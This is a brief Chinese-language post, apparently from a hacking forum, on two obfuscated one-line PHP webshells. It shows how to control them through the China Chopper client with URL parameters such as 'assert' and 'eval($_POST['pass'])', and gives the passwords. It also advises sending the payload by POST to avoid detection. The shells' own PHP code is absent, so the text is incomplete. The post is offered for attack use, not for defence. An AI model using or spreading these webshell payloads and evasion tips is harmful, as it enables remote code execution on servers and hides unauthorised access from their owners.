两个变形的一句话php木马

第一种:1.php

我变了一下,在菜刀里写http://localhost/1.php?2=assert密码是1
第二种2.php

在菜刀里写
http://localhost/2.php?_=assert&__=eval($_POST['pass']) 密码是pass

这两种就可以直接用菜刀了。
不过我是直接写在url里,如果你用菜刀的附加数据的话更隐蔽,因为是post提交的。